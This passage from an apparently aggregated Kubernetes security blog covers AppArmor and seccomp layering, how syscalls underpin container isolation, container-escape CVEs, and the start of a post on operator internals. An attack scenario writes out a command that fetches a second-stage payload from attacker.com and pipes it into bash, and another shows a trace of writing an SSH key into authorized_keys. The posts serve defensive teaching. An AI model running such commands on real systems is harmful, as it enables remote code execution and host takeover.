Step 8 is the one teams skip: Profiles drift out of sync with applications as code changes. An overly permissive profile that hasn't been reviewed in 18 months is security debt. Treat profile review as part of your service's security hygiene, not a one-time setup task.

Designing for Control Failure

In real systems, controls fail. Profiles drift. Runtimes change defaults. Exceptions get introduced under pressure and never revisited. The value of layering is not redundancy — it's graceful degradation.

When reasoning about your security posture, think through each layer's failure mode:

If seccomp fails (missing profile, wrong defaults)
  → AppArmor still restricts filesystem and object access
  → Capabilities still bound privilege
  → NetworkPolicy still governs egress

If AppArmor fails (Unconfined exception, profile drift)
  → Seccomp still blocks high-risk syscall classes
  → readOnlyRootFilesystem still prevents write exploitation
  → Capabilities still block privileged operations

If both fail
  → Capabilities + PSS Restricted still constrain privilege
  → Detection (Falco/Tetragon) becomes your last active layer
  → NetworkPolicy still limits lateral movement

This framing changes how you think about rollout decisions. A team that disables AppArmor under incident pressure hasn't removed one control — they've removed one layer of a degradation chain. The question is: which other layers are still in place, and are they configured to compensate?

It also informs how you instrument for failure. Monitoring that seccomp is applied (via the pod's securityContext) and AppArmor is loaded (via aa-status) should be part of your cluster's security posture signals — not one-time setup validation.

Key Takeaways

AppArmor's value comes from how you operate it, not that you've enabled it. Seccomp's value comes from the specificity of your profile, not the existence of one.

RuntimeDefault for both is not a security posture — it's a starting point. RuntimeDefault seccomp blocks ~44 high-risk syscalls but doesn't cover newer attack surfaces like io_uring. RuntimeDefault AppArmor is not a single well-defined thing; modern runtimes have converged but differences remain, and those differences matter in hardened environments.

AppArmor has real blind spots: network exfiltration, in-memory attacks, kernel exploits, and path-based bypass via mount manipulation. Seccomp has its own: it cannot enforce path-level access control, cannot reason about what allowed syscalls operate on, and cannot make stateful policy decisions. These aren't reasons to skip either control — they're reasons to understand what you're actually enforcing and pair both with NetworkPolicy and runtime detection.

Custom Localhost AppArmor profiles managed declaratively via the Security Profiles Operator, combined with custom seccomp profiles scoped to actual workload behavior, are the only way to get a consistent, auditable posture at scale.

On modern kernels with LSM stacking, AppArmor, BPF-LSM, and Landlock can coexist — enabling layered MAC enforcement that goes beyond any single module. eBPF-based systems like Tetragon express things AppArmor and seccomp cannot: dynamic, context-aware enforcement based on process ancestry and runtime state. These are complementary layers, not alternatives.

When something goes wrong, AppArmor denial logs are among your highest-quality signals for distinguishing misconfiguration from intrusion. Build that triage path before you need it.

The Real Purpose of AppArmor

AppArmor's goal is not to stop every exploit. No single control does that.

Its goal is to force attackers to cross more boundaries — and to create high-fidelity signals when they try.

A compromised container under a well-authored AppArmor profile cannot silently read credentials, probe /proc, write to kernel interfaces, or move laterally via the filesystem. The attacker's options narrow, and each attempt they make is logged with enough context to tell you exactly what was tried.

In modern Kubernetes platforms, AppArmor and seccomp are most valuable not as standalone controls, but as two layers in a deliberate architecture:

Layer	What it restricts	Enforcement point
Seccomp	Which syscalls the kernel will execute	Before kernel entry (cBPF filter)
AppArmor	What objects permitted syscalls can access	LSM hooks during kernel execution
NetworkPolicy	Where data can go	iptables / eBPF dataplane
Runtime detection	When behavior deviates from baseline	eBPF observability (Falco, Tetragon)

No single control is sufficient. The platform architecture is the control — and these two layers together make the attack surface explicit, auditable, and enforceable at both the syscall invocation and object access levels.

One framing worth keeping: Kubernetes doesn't implement these controls — it orchestrates them. securityContext, appArmorProfile, and seccompProfile are instructions to the Linux kernel. The real enforcement always happens below the Kubernetes abstraction layer, in the kernel's syscall path. Understanding that boundary is what prevents "we have AppArmor configured" from being confused with "we have AppArmor enforcing what we think it is."

Security is not about stacking controls — it's about understanding where each control stops.

If You Remember Only One Thing Per Control

Control	What it does	What it doesn't do
Seccomp	Reduces which syscalls the kernel will execute	Cannot restrict what allowed syscalls operate on
AppArmor	Reduces which objects processes can access	Cannot block syscall invocation
Capabilities	Reduces which privileged operations are allowed	Neither path-aware nor syscall-surface aware
NetworkPolicy	Restricts where data can go	No visibility into process behavior
Runtime detection	Catches deviation from baseline behavior	Detection, not prevention

The table is also a checklist: if you can't articulate what each layer doesn't cover, you're configuring controls, not designing a security posture.

Closing Thoughts

The engineers who get this right aren't the ones who've read the most documentation. They're the ones who've been paged at 2am, watched a team disable AppArmor under pressure and never re-enable it, and learned the hard way that "we have security controls" and "we know what our security controls actually enforce" are different claims.

AppArmor and seccomp are not hard to enable. They're hard to operate correctly over time — as applications change, nodes are replaced, sidecars are added, and profiles drift silently out of sync. The tooling exists to do this well: the Security Profiles Operator for lifecycle management, SPO's record mode for profile generation, SIEM integration for denial signals, and eBPF-based detection for the gaps neither control can fill.

What separates a security posture from a compliance checkbox is whether you've thought through the failure modes — what happens when a profile is missing, when a runtime changes its defaults, when a team adds Unconfined during an incident. That's the work. The YAML is the easy part.

For a deeper understanding of the syscall mechanics that both controls rely on, see the companion post: Syscalls in Kubernetes: The Invisible Layer That Runs Everything.

Originally Published at https://platformwale.blog

Syscalls in Kubernetes: The Invisible Layer That Runs Everything

Piyush Jajoo — Thu, 19 Mar 2026 01:47:04 +0000

Every abstraction in Kubernetes — containers, namespaces, cgroups, networking — eventually collapses into a syscall. If you want to reason seriously about security, observability, and performance at the platform level, you need to understand what's happening at this layer.

The Problem With "Containers Are Isolated"
What Is a Syscall, Really?
The io_uring Problem
The CPU Privilege Model
Anatomy of a Syscall
How Containers Change the Equation
The Kubernetes Security Stack — Layer by Layer
- seccomp: Your Syscall Firewall
- Falco: Syscall-Level Runtime Detection
- eBPF: Programmable Kernel Hooks
- gVisor: The User-Space Kernel
- LSMs: Mandatory Access Controls
Real-World Scenarios
Performance Implications
What a Staff Engineer Should Own
Further Reading

The Problem With "Containers Are Isolated"

When engineers first learn Kubernetes, they're told: containers are namespaced processes. And that's mostly true — namespaces isolate PIDs, mount points, and network interfaces; cgroups constrain CPU and memory. The abstraction holds well enough.

Until it doesn't.

In 2019, CVE-2019-5736 exploited a file-descriptor mishandling bug in runc: a container process running as root could open /proc/self/exe, which transparently resolves to the host's runc binary via procfs semantics — bypassing normal symlink sandboxing. The container could overwrite the runc binary mid-execution and gain host root.
In 2022, CVE-2022-0492 found a missing capability check in the kernel's cgroup_release_agent_write function — a container without CAP_SYS_ADMIN in the host namespace could create a new user namespace via unshare, mount cgroupfs inside it, and write an arbitrary path to release_agent. When the cgroup emptied, the kernel executed that path as root on the host.

Both exploits were entirely syscall-driven — no memory corruption required. Crucially, both were blocked by the Docker default seccomp profile and AppArmor — which is precisely why those defaults exist, and why disabling them on production workloads is so dangerous.

The root cause in every container escape: containers share the host kernel. And the kernel is reached exclusively through syscalls.

If you're a platform or infrastructure engineer running multi-tenant Kubernetes, this isn't a security team problem. It's your problem. And it starts with understanding syscalls.

What Is a Syscall, Really?

Your application — whether it's written in Go, Python, Java, or Rust — runs in user space. It has no direct access to hardware, the filesystem, or the network. It cannot allocate physical memory. It cannot open a socket.

To do any of these things, it must ask the kernel — and the only mechanism to do that is a system call (syscall).

Think of it like this: your application is a tenant in an apartment building. The kernel is the building manager who controls access to electricity, water, and the internet. The syscall is the intercom — the only way to request something from the manager.

Linux exposes roughly 450 syscalls on x86-64 as of modern 6.x kernels (kernel 5.4 had ~435; kernel 6.1 reached ~450; 6.8+ ~460). The count grows with each release as new interfaces like io_uring and landlock are added. The most commonly used in a typical web application: read, write, open, close, socket, connect, mmap, clone, execve, exit. A typical containerized service uses fewer than 50 distinct syscalls in steady state.

This matters enormously — because the ones you don't need are your attack surface.

The `io_uring` Problem

Before getting into privilege rings and syscall mechanics, it's worth calling out the most significant shift in the Linux syscall surface of the past few years: io_uring.

Introduced in Linux 5.1 (2019), io_uring is an asynchronous I/O interface built around two ring buffers shared between user space and the kernel. The design goal was to eliminate the per-operation syscall overhead that makes high-throughput I/O expensive under KPTI(Kernel Page-Table Isolation). Instead of calling read() or write() per operation, applications submit batches of I/O requests by writing into the submission queue (SQ ring) and poll the completion queue (CQ ring) for results — all without a syscall per operation.

The performance gains are real — io_uring can drive storage and network I/O at significantly higher throughput than traditional syscall-per-operation patterns. But it introduced a massive new kernel attack surface.

The Security Problem

io_uring operations execute in the kernel with elevated context. Because the interface is complex, stateful, and relatively new, it has been a prolific source of privilege escalation vulnerabilities:

CVE	Year	Impact
CVE-2021-41073	2021	Type confusion in `io_uring` leading to privilege escalation
CVE-2022-29582	2022	Use-after-free in `io_uring` — container escape
CVE-2023-2598	2023	Heap out-of-bounds write via `io_uring` fixed buffers

Each of these was reachable from an unprivileged container process. Because io_uring isn't a single syscall but a kernel subsystem accessed via three syscalls (io_uring_setup, io_uring_enter, io_uring_register), the standard seccomp RuntimeDefault profile does not block it — it was introduced after the default profiles were designed.

What To Do

Many hardened environments explicitly block io_uring at the seccomp level:

{
  "syscalls": [
    {
      "names": ["io_uring_setup", "io_uring_enter", "io_uring_register"],
      "action": "SCMP_ACT_ERRNO"
    }
  ]
}

Google's own gVisor disables io_uring by default. The Kubernetes v1.33 audit trail and several CIS benchmarks now explicitly recommend blocking io_uring for workloads that don't require it.

The staff-level takeaway: every time the kernel adds a new high-performance I/O interface, it adds a new attack surface that existing seccomp profiles don't cover. io_uring is the canonical example. Your seccomp profile graduation pipeline must account for new kernel subsystems, not just new individual syscalls.

The CPU Privilege Model

To understand why syscalls exist, you need to understand how CPUs enforce privilege boundaries.

Modern x86-64 processors have four privilege rings:

Linux only uses Ring 0 (kernel) and Ring 3 (user). When your application executes the syscall instruction, the CPU immediately:

Saves the current register state
Switches to kernel mode (Ring 0)
Jumps to the kernel's syscall handler
Executes the requested operation
Restores registers and returns to Ring 3

This mode switch is the only sanctioned transition. Without it, user-space code cannot touch kernel data structures, physical memory, or hardware. It's a hardware-enforced boundary — not a software convention.

The critical insight for container security: this boundary is per-kernel, not per-container. When two containers run on the same node, they use the same syscall gateway into the same kernel. A syscall that bypasses a kernel check escapes both containers simultaneously.

Anatomy of a Syscall

Let's trace a concrete example. Suppose a Go HTTP server accepts a connection and reads the request body.

What looks like a single conn.Read() call results in:

One or more read(2) syscalls on the socket file descriptor
The kernel checking the process's permissions, the socket state, and available data
A DMA transfer from the NIC's ring buffer into kernel memory, then copied to user space

Every one of those kernel checks is a potential security enforcement point — and every kernel bug in that path is a potential vulnerability reachable from your container.

How Containers Change the Equation

A VM gives each workload its own kernel. A container does not.

Containers get:

PID namespace — isolated process tree
Network namespace — isolated network stack
Mount namespace — isolated filesystem view
cgroups — CPU/memory resource limits

Containers do not get:

Their own kernel
Their own syscall table
Kernel memory isolation

This does not mean containers have zero isolation. Multiple mechanisms reduce the blast radius of a kernel compromise:

Namespaces — restrict what a container can see (PIDs, mounts, network)
cgroups — bound resource consumption
Linux Capabilities — limit the privilege set a container process holds
seccomp — restrict which syscalls can be made at all
LSMs (AppArmor/SELinux) — enforce mandatory access controls even on permitted syscalls

These work as defence-in-depth layers, not as kernel isolation equivalents. A VM still provides a fundamentally stronger boundary because kernel bugs in one tenant cannot affect another tenant's kernel. But a well-configured container is far harder to escape than a bare process.

This means if Container A can trigger a kernel bug via a syscall — say, a privilege escalation in clone() or a heap overflow in io_uring — it affects the host and every other container on that node.

Real scenario: In 2022, CVE-2022-0492 found a missing capability check in the kernel's cgroup_release_agent_write function. The kernel failed to verify that the calling process held CAP_SYS_ADMIN in the initial user namespace. A container process could call unshare() to create a new user namespace and cgroup namespace, mount cgroupfs inside it, then write an arbitrary host binary path to release_agent — all without elevated host privileges. When the cgroup became empty, the kernel executed that binary as root on the host. Zero memory corruption: just unshare(), mount(), and write() syscalls in the right sequence. Critically, containers running with the Docker default seccomp profile or AppArmor/SELinux were not vulnerable — those layers blocked the required mount() and unshare() calls. Only permissive configurations (no seccomp, no MAC) were at risk.

The Kubernetes Security Stack — Layer by Layer

Given that containers share a kernel, how do you defend the syscall boundary? There are five complementary mechanisms — each operating at a different point in the syscall path:

seccomp: Your Syscall Firewall

seccomp (Secure Computing Mode) is a Linux kernel feature that lets you attach a BPF filter to a process. The filter is evaluated on every syscall before the kernel executes it. When a syscall is not allowed, the filter's configured action determines the outcome — it is not always a simple EPERM:

seccomp Action	Behaviour
`SCMP_ACT_ALLOW`	Syscall proceeds normally
`SCMP_ACT_ERRNO`	Returns an error code (e.g. `EPERM`) — the default for RuntimeDefault
`SCMP_ACT_KILL_PROCESS`	Immediately kills the process — used for highest-risk syscalls
`SCMP_ACT_LOG`	Logs the syscall, allows it — useful for audit-mode profiling
`SCMP_ACT_TRACE`	Notifies a `ptrace` tracer — used for policy development tooling
`SCMP_ACT_NOTIFY`	Sends the event to a user-space supervisor via fd — enables policy agents

The Kubernetes RuntimeDefault profile uses SCMP_ACT_ERRNO for disallowed syscalls. Custom profiles can mix actions — kill on ptrace, log on unknown syscalls during a grace period, and allow everything else.

Analogy: seccomp is a bouncer at the kernel's door. Your app can only get in if the syscall is on the guest list.

Kubernetes exposes this via seccompProfile:

apiVersion: v1
kind: Pod
spec:
  securityContext:
    seccompProfile:
      type: RuntimeDefault   # containerd/docker's default profile
  containers:
  - name: api-server
    image: myapp:latest
    securityContext:
      allowPrivilegeEscalation: false

The RuntimeDefault profile blocks ~44 high-risk syscalls including:

Syscall	Why it's dangerous
`ptrace`	Allows one process to inspect/modify another's memory. Classic injection vector.
`clone` (namespace-creating flags only)	The profile blocks `CLONE_NEWUSER` and `CLONE_NEWNS` flag combinations — not `clone` itself, which many workloads need for thread creation. Namespace-creating variants are the escape vector.
`syslog`	Reads kernel message buffer. Information disclosure.
`perf_event_open`	Side-channel attack surface (Spectre-class).
`keyctl`	Access to kernel keyring. Credential theft.
`bpf`	Load eBPF programs. Privilege escalation surface.

For high-security workloads, RuntimeDefault isn't enough. You want a custom profile scoped to what your specific workload actually calls. Here's the workflow:

Production tip: Start with RuntimeDefault, instrument with Falco to catch EPERM signals, then tighten to a custom profile over one or two release cycles. Don't try to go from zero to custom profile in one shot — you'll break things.

Falco: Syscall-Level Runtime Detection

Falco (CNCF project) hooks into the kernel's syscall stream — via a kernel module or an eBPF probe — and evaluates every syscall event against a rule engine in user space.

Falco rules are expressive and context-aware:

- rule: Shell Spawned in Container
  desc: A shell was spawned in a container that should not run shells
  condition: >
    spawned_process and
    container and
    shell_procs and
    not proc.pname in (allowed_parents)
  output: >
    Shell spawned in container
    (pod=%k8s.pod.name ns=%k8s.ns.name
     cmd=%proc.cmdline parent=%proc.pname
     image=%container.image.repository)
  priority: CRITICAL

Why Falco catches what application-level monitoring misses:

All behavior — no matter how sophisticated — eventually becomes syscalls. An attacker who compromises your app and tries to:

Read /etc/shadow → openat() syscall → Falco sees it
Exfiltrate data via DNS → socket() + connect() → Falco sees it
Escalate privileges → setuid() / clone() → Falco sees it
Download a second-stage payload → execve("curl", ...) → Falco sees it

No agent in your application code. No SDK to integrate. Pure kernel-level observation.

Staff-level consideration: Falco's event throughput on a busy node can be high — 100k+ syscall events/sec on a heavily loaded API server node. You need to think about the Falco deployment model (DaemonSet with kernel module vs. eBPF probe), rule cardinality, and alert fatigue suppression from the start. Falco's modern eBPF probe requires kernel ≥5.8 (for BPF ring buffer and BTF/CO-RE support) and has been the default driver since Falco 0.38.0 — it is bundled directly in the Falco binary, requiring no separate kernel module compilation. In Falco 0.43.0, the legacy eBPF probe (engine.kind=ebpf) was deprecated (not the kernel module — kmod remains supported for older kernels). The driver decision tree in production: kernel ≥5.8 → modern eBPF (default, zero driver download); kernel <5.8 → kernel module (kmod), which requires matching kernel headers and breaks on kernel upgrades.

eBPF: Programmable Kernel Hooks

eBPF (extended Berkeley Packet Filter) is one of the most significant additions to the Linux kernel in the last decade. It lets you load sandboxed programs into the kernel that execute at specific hook points — including syscall entry and exit — without modifying kernel source or loading full kernel modules.

The verifier is the key safety property: before any eBPF program executes in the kernel, the verifier statically proves it terminates, doesn't access invalid memory, and can't crash the kernel. This gives you programmable kernel instrumentation without the risk of a buggy kernel module taking down the node.

How Kubernetes tooling uses eBPF:

Tool	eBPF Hook	What it achieves
Cilium	`tc`, `xdp`, socket hooks	L3/L4/L7 network policy without iptables
Tetragon	`kprobe`, `tracepoint`	Enforce policy at kernel function level (not just syscall boundary)
Pixie	`uprobe` + syscall hooks	Capture HTTP headers, SQL queries, gRPC frames without app changes
Parca	`perf_event`	Continuous CPU profiling with stack traces
Falco	Tracepoint / raw syscall	Runtime security event stream

Staff-level insight: The shift from iptables/ipvs to eBPF-based networking (Cilium) is not just a performance improvement. It's a security architecture change. With iptables, policy is evaluated at netfilter hooks — after the syscall has returned and the packet is already in the kernel's network stack. With eBPF XDP(eXpress Data Path), you can drop packets before they even DMA(Direct Memory Access) into kernel memory. The enforcement point moves earlier in the execution path.

XDP (eXpress Data Path) refers to a high-performance packet processing path in the Linux kernel that runs very early in the network stack.
DMA (Direct Memory Access) is the mechanism that allows network hardware (NIC) to transfer packet data directly into system memory without CPU intervention.

gVisor: The User-Space Kernel

gVisor takes a fundamentally different approach: instead of filtering which syscalls your container can make, it intercepts all syscalls and handles them in a user-space kernel called the Sentry.

The Sentry is written in Go and implements the Linux syscall ABI(Application Binary Interface). When your container app calls open(), the Sentry handles it — checking permissions, managing file descriptors — using only a narrow set of host syscalls to do so. The host kernel's attack surface shrinks from ~450 syscalls to a few dozen host syscalls. Per gVisor's own security documentation, this is in the range of 53–68 depending on whether networking (Netstack) is enabled — but this figure varies by platform and gVisor version. The key invariant: no syscall is ever passed through directly. Each one has an independent implementation inside the Sentry, so even if the Sentry's syscall handling has a bug, the host kernel's full attack surface is never exposed.

Where this is deployed: Google Cloud Run and GKE Sandbox use gVisor. If you run untrusted code (user-submitted functions, multi-tenant FaaS), gVisor is the right choice. For trusted first-party workloads, the overhead (10-15% latency increase on I/O-heavy workloads) may not be justified.

The tradeoff is explicit:

Attack surface reduction = performance cost
More isolation           = more overhead

seccomp + eBPF gets you 80% of the protection at ~1% overhead. gVisor gets you 99% protection at 10-15% overhead. Choose based on your threat model.

LSMs: Mandatory Access Controls

seccomp decides which syscalls a process can make. Linux Security Modules (LSMs) decide what those syscalls can do — even after they've been permitted.

The distinction matters. A container's seccomp profile might allow openat() (it's fundamental to almost every workload). An LSM then enforces which paths that openat() can access. The syscall passes seccomp; the kernel's LSM hook fires before the file is opened; access is denied.

Three LSMs are relevant in Kubernetes:

LSM	Mechanism	Kubernetes Usage
AppArmor	Path-based profiles — restrict file access, network, capabilities per process	Default on Ubuntu/Debian nodes; containerd applies profiles per container
SELinux	Label-based mandatory access control — every process and file has a security context	Default on RHEL/CentOS nodes; OpenShift enforces SELinux across all pods
Landlock	Unprivileged sandboxing — processes can voluntarily restrict their own file access	Emerging; available since kernel 5.13; useful for defence-in-depth in application code

Why this matters for CVE-2022-0492: That exploit required unshare() and mount() syscalls. seccomp's RuntimeDefault profile blocked them. But if you'd been running without seccomp, AppArmor's default container profile would have independently denied the mount operation. This is defence-in-depth working as intended — two independent layers, either of which alone would have stopped the exploit.

Staff-level note: AppArmor and SELinux profiles are often set to Unconfined in practice because they're hard to operationalise at scale. This is the real risk — not that the tools don't work, but that they're disabled. A platform team should treat LSM profile coverage as a first-class metric alongside seccomp adoption.

Real-World Scenarios

Scenario 1: The Cryptominer Escape

What happened: An attacker compromised a poorly-configured Redis instance in a container (no auth, exposed port). They:

Used Redis's CONFIG SET dir and CONFIG SET dbfilename to write an SSH public key to /root/.ssh/authorized_keys on the host — possible because the container ran as root and the host /root was mounted in.
SSHd into the host directly.

Syscall trace of the attack:

openat(AT_FDCWD, "/mnt/host-root/.ssh/authorized_keys", O_WRONLY|O_CREAT)
write(fd, "ssh-rsa AAAA...", ...)

What would have caught it:

seccomp: A custom profile would not have blocked openat (it's fundamental), but mounting host paths is a Kubernetes admission controller concern.
Falco rule: openat to a path outside the container's expected directories → alert.
Root cause fix: Don't run containers as root. Use runAsNonRoot: true. Don't mount host paths.

Scenario 2: The Lateral Movement via `execve`

What happened: An attacker found an RCE in a Java app. The exploit triggered Runtime.exec("curl http://attacker.com/stage2 | bash").

Syscall sequence:

clone()         → fork a child process
execve("bash")  → replace child with bash
execve("curl")  → curl downloads payload
execve("bash")  → execute payload

What Falco catches immediately:

A Java process (java) spawning bash → anomalous parent-child relationship
curl executing from within a container that has no business running curl
execve of any shell from a non-shell expected workload

What seccomp can do: If your Java service has a custom seccomp profile that doesn't include execve at all (many services never need to fork/exec), the clone() + execve() chain is blocked before it starts.

Scenario 3: eBPF-Based Zero-Trust Networking

Setup: You're migrating from an iptables-based CNI to Cilium. The goal is L7-aware network policy.

Without eBPF, enforcing "Pod A can call /api/users on Pod B but not /api/admin" requires an L7 proxy sidecar (Istio/Envoy). Every request goes:

App → Envoy sidecar (user space) → Kernel → Network → Kernel → Envoy sidecar → App

That's four kernel crossings per request.

With Cilium's eBPF-based L7 policy:

App → Kernel (eBPF L7 hook) → Network → Kernel (eBPF L7 hook) → App

Two kernel crossings for L3/L4 policy. For L7 (HTTP method/path inspection), Cilium uses a per-node Envoy proxy — not a per-pod sidecar — which is redirected to via eBPF socket hooks. This eliminates the per-pod sidecar overhead while still enabling L7 enforcement. The key distinction: L3/L4 enforcement is entirely in eBPF (zero user-space hops); L7 enforcement redirects through a shared node-level proxy rather than duplicating a proxy instance per pod.

The syscall angle: eBPF programs attach to sock_ops and sk_msg hooks — fired at socket-level syscall boundaries. Before a TCP connection is fully established or a stream is forwarded, the eBPF program has already made the L3/L4 allow/deny decision, with L7 decisions delegated to the node Envoy.

Performance Implications

Every syscall has a cost. The mode switch from Ring 3 (user mode) to Ring 0 (kernel mode) takes 100–300 nanoseconds on modern hardware — negligible per call, but significant at scale. Two factors in Kubernetes amplify this cost beyond the baseline.

The two biggest syscall performance concerns in Kubernetes:

1. Meltdown / KPTI Mitigations

In January 2018, researchers disclosed Meltdown (CVE-2017-5754), a CPU vulnerability that allowed user-space code to read arbitrary kernel memory by exploiting speculative execution — a CPU optimization where the processor runs instructions ahead of time before determining if they should actually execute. An attacker could use this to read secrets (keys, passwords, tokens) that the kernel had in memory from other processes, all without elevated privileges.

The fix was KPTI (Kernel Page Table Isolation), shipped in Linux 4.15+ and backported to LTS kernels. The idea: keep two completely separate page tables — one for user space (which has no mappings to kernel memory), and one for kernel space (which has full mappings). Before KPTI, both user and kernel code shared a single page table with kernel memory mapped but protected. With KPTI, kernel memory is invisible to user space entirely; there's nothing to speculatively leak.

Note: KPTI does not address Spectre (CVE-2017-5753, CVE-2017-5715), a related but distinct speculative execution vulnerability. Spectre mitigations — Retpoline (a compiler technique to prevent speculative indirect branch prediction), IBRS (microcode that restricts cross-privilege speculative execution), and IBPB (a barrier that flushes branch predictor state between privilege contexts) — are separate and independently expensive.

How KPTI makes syscalls more expensive:

On every user↔kernel transition, the CPU must switch between the two separate page table sets. This is done via the CR3 register — the control register that points to the currently active page table. A CR3 write forces the CPU to start using a different page table, which inherently invalidates the TLB (Translation Lookaside Buffer) — the CPU's cache of recent virtual-to-physical address translations. A cold TLB means the next memory accesses require expensive page table walks instead of cache hits.

Modern Intel/AMD CPUs support PCID (Process Context Identifiers), a hardware feature that tags TLB entries with a context ID so the CPU can maintain TLB entries for multiple address spaces simultaneously. With PCID, a CR3 switch doesn't require flushing the entire TLB — the CPU simply activates a different set of tagged entries. This significantly reduces KPTI's overhead, but the CR3 switch itself still has a cost.

Real-world overhead on PCID-enabled modern CPUs:

Workload type	KPTI overhead
Typical Kubernetes API server / web services	2–10%
Syscall-heavy services (high-RPS Redis, dense I/O pipelines)	20–30%
Pathological microbenchmarks (>1M syscalls/sec/CPU)	Up to 800%*

Brendan Gregg, Netflix — a lab scenario, not a production baseline. For most Kubernetes workloads, **5–10% is a realistic planning budget*.

This is the architectural reason io_uring was designed the way it was (see The io_uring Problem): by sharing ring buffers between user space and kernel space, applications can submit and complete many I/O operations without a syscall per operation, amortizing KPTI overhead across batches.

2. Syscall Frequency vs. Batching

Beyond KPTI, the raw number of syscalls a service issues matters independently. The Ring 3→Ring 0→Ring 3 round-trip is not just a page-table cost — it also involves register saves/restores, privilege checks, and kernel stack setup. These are fixed costs per syscall, regardless of how much work is done inside.

A service making 100,000 small write() calls is slower than one making 10,000 write() calls with 10x larger buffers, even if total bytes are identical. This is why Go's bufio.Writer, Java's BufferedWriter, and virtually all I/O abstractions exist — they buffer writes in user space and flush in larger chunks, reducing syscall frequency. The actual data movement is the same; the kernel crossing overhead is not.

The Kubernetes-specific manifestation: services with high syscall frequency per RPS are more sensitive to noisy neighbors — other workloads on the same node that drive up syscall contention. A cryptominer running mmap in a tight loop on the same physical node will degrade your API latency through two mechanisms:

Syscall contention — the kernel serializes certain operations; many concurrent syscalls from different containers compete for kernel-internal locks.
Cache pollution — frequent KPTI-driven CR3 switches and the kernel code paths they invoke thrash the CPU's L1/L2 instruction and data caches, degrading cache hit rates for your workload's subsequent kernel entries.

This happens even if cgroups are correctly configured for CPU and memory — cgroups do not limit syscall rate or kernel cache footprint.

Falco and eBPF-based profiling tools like Parca can surface these patterns before they become incidents. Parca attaches to perf_event hooks to capture continuous CPU flame graphs — if you see kernel time unexpectedly high in your service's profile during a noisy-neighbor incident, syscall pressure is the first thing to investigate.

What a Staff Engineer Should Own

Understanding syscalls isn't just trivia — it maps directly to ownership responsibilities at the platform level.

Concrete deliverables a staff engineer should drive:

Syscall baseline per workload class — profile what syscalls each service tier actually uses in staging. Use this to inform both seccomp profiles and anomaly detection thresholds.
seccomp profile graduation pipeline — automate the path from RuntimeDefault → custom profile. Record in staging, diff against baseline, promote on green CI.
Falco rule library with suppression logic — raw Falco rules generate alert fatigue. Build suppression for known-safe patterns (init containers, health checks, log rotation) and escalation logic for true positives.
Kernel upgrade policy — every kernel version changes the syscall landscape (new io_uring operations, new bpf commands). Define a test matrix that validates your seccomp profiles and Falco rules against each kernel version before rollout.
Threat model documentation — explicitly document your isolation assumptions. If you're running RuntimeDefault seccomp on a multi-tenant cluster, you need to acknowledge the residual risk from the ~450 exposed syscalls and justify it against the cost of gVisor or stricter profiles.
Syscall drift detection — new application versions routinely introduce new syscalls, especially as third-party dependencies update. A tightened seccomp profile that worked in v1.4.0 can silently break workloads in v1.5.0 when a new library starts calling io_uring_setup or getrandom. A production platform should automatically detect syscall drift during canary deployments — compare the observed syscall set against the approved profile baseline and surface divergences before the canary promotes to production. Tools like inspektor-gadget and Falco's audit mode can instrument this automatically.

Kubernetes Operators: A Deep Dive into the Internals

Piyush Jajoo — Wed, 25 Feb 2026 18:55:44 +0000

Written from the perspective of a senior engineer who has built, debugged, and battle-tested operators in production.

Why Operators Exist
The Conceptual Foundation: Control Theory
Kubernetes API Machinery: The Backbone
Custom Resource Definitions (CRDs)
The Controller Runtime: Inside the Engine
Informers, Listers, and the Cache
The Reconciliation Loop in Depth
Work Queues and Rate Limiting
Watches, Events, and Predicates
Ownership, Finalizers, and Garbage Collection
Status Subresource and Conditions
Generation vs ObservedGeneration: A Deep Dive
Concurrency, MaxConcurrentReconciles, and Cache Scoping
Leader Election
Webhooks: Admission and Conversion
Operator Patterns and Anti-Patterns
Observability and Debugging
Production Considerations
Ready to Build Your Own Operator

Why Operators Exist

Before we dive into internals, let's get philosophical for a moment. Kubernetes gives you primitives: Pods, Deployments, Services, ConfigMaps. These are general-purpose building blocks. They're powerful, but they're dumb — they don't understand your application's operational semantics.

Consider a PostgreSQL cluster. A skilled DBA knows:

How to perform a rolling upgrade without downtime
When and how to promote a standby to primary during a failure
How to orchestrate backups in a consistent way
How to resize volumes without data loss

None of this knowledge lives in native Kubernetes. An Operator is the mechanism to codify operational expertise into software that runs inside your cluster and manages resources on your behalf.

The formal definition: An Operator is a custom controller that manages Custom Resources to automate complex, stateful application lifecycle management.

The Conceptual Foundation: Control Theory

Every operator is, at its core, an implementation of a closed-loop control system — specifically what control engineers call a feedback control loop.

The three core concepts are:

Desired State — What you declare in your Custom Resource (the spec field). This is immutable intent.

Observed State — What's actually running in the cluster right now (the status field plus the state of managed child resources).

Reconciliation — The act of computing the delta between desired and observed state, then taking actions to close that gap.

Controllers are implemented on top of event streams (watch events from the Kubernetes API), but their reconciliation logic is level-based, not edge-triggered. The trigger is event-driven; the behavior is not. Rather than reacting once to a specific event, the controller always asks "is the world in the state I want?" and drives toward that state regardless of how many events fired. This distinction matters enormously for resilience: if you miss an event, the next reconciliation catches it anyway. Contrast this with a purely edge-triggered system where a missed event means a missed action — permanently.

Kubernetes API Machinery: The Backbone

Before building or understanding operators, you need a solid mental model of how the Kubernetes API server works.

Every object in Kubernetes is stored in etcd as a versioned, typed resource. The API server exposes these objects via a RESTful interface. Critically, the API server supports a Watch mechanism — clients can subscribe to a stream of events for any resource type.

The watch stream delivers three event types: ADDED, MODIFIED, DELETED. These are the raw signals your controller eventually acts on, though — as we'll see — the controller runtime abstracts this considerably.

Resource Versions are central to the concurrency model. Every object has a resourceVersion field — an opaque string used for optimistic concurrency control. It is derived from etcd's internal revision mechanism, but clients must always treat it as opaque: never parse it, compare it numerically, or make assumptions about its format. When you update an object, you must send the current resourceVersion to guarantee a compare-and-swap, preventing lost updates in concurrent environments.

Custom Resource Definitions

CRDs are how you extend the Kubernetes API. When you apply a CRD, the API server dynamically registers new API endpoints, enables storage in etcd, and starts serving your custom resources as first-class API objects.

A CRD has several important structural components:

apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
  name: databases.mycompany.io
spec:
  group: mycompany.io
  names:
    kind: Database
    plural: databases
    singular: database
    shortNames: ["db"]
  scope: Namespaced
  versions:
    - name: v1alpha1
      served: true
      storage: true
      schema:
        openAPIV3Schema:
          # Structural schema for validation
      subresources:
        status: {}           # Enables /status subresource
        scale:               # Optional: enables /scale subresource
          specReplicasPath: .spec.replicas
          statusReplicasPath: .status.replicas
      additionalPrinterColumns:
        - name: Phase
          type: string
          jsonPath: .status.phase

The status subresource deserves special attention. When enabled, spec and status become separately updatable — meaning only the controller should write to status, and users should only write to spec. This enforces a clean separation of intent vs. observation.

